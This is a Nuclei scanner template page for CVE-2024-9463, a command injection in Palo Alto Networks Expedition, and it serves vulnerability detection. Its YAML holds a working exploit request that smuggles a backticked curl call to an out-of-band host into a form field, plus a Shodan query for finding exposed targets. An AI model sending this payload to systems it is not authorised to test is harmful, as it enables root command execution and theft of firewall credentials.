Skip to content
Nuclei Templates

PaloAlto Networks Expedition - Remote Code Execution

ID: CVE-2024-9463

Severity: critical

Author: princechaddha

Tags: cve,cve2024,palo-alto,rce,kev

Description

Section titled “Description”

An OS command injection vulnerability in Palo Alto Networks Expedition allows an unauthenticated attacker to run arbitrary OS commands as root in Expedition, resulting in disclosure of usernames, cleartext passwords, device configurations, and device API keys of PAN-OS firewalls.

YAML Source

Section titled “YAML Source”
id: CVE-2024-9463


info:
  name: PaloAlto Networks Expedition - Remote Code Execution
  author: princechaddha
  severity: critical
  description: |
    An OS command injection vulnerability in Palo Alto Networks Expedition allows an unauthenticated attacker to run arbitrary OS commands as root in Expedition, resulting in disclosure of usernames, cleartext passwords, device configurations, and device API keys of PAN-OS firewalls.
  impact: |
    Successful exploitation could result in unauthorized access and control of the affected device.
  remediation: |
    Apply the necessary security patches provided by Palo Alto Networks to mitigate the CVE-2024-9463 vulnerability.
  reference: |
    - https://x.com/watchtowrcyber/status/1844306954245767623
    - https://security.paloaltonetworks.com/PAN-SA-2024-0010
    - https://github.com/fkie-cad/nvd-json-data-feeds
    - https://nvd.nist.gov/vuln/detail/CVE-2024-9463
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/S
    cvss-score: 9.9
    cve-id: CVE-2024-9463
    cwe-id: CWE-78
    epss-score: 0.00043
    epss-percentile: 0.10347
  metadata:
    verified: true
    max-request: 1
    vendor: paloaltonetworks
    product: expedition
    shodan-query: http.favicon.hash:1499876150
  tags: cve,cve2024,palo-alto,rce,kev


http:
  - raw:
      - |
        POST /API/convertCSVtoParquet.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        ram=watchTowr`curl+{{interactsh-url}}`


    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"


      - type: word
        part: body
        words:
          - "Undefined index: taskID"
# digest: 4a0a00473045022046d30f7a96cbbb0e89db4cbbcc2eb668e5d078f1a0500be71ad69ccd37a5cf77022100857e658ddccbefb6204480020ec9a024288dede1004d7809f78c67afbf05dcd1:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-9463.yaml"

View on Github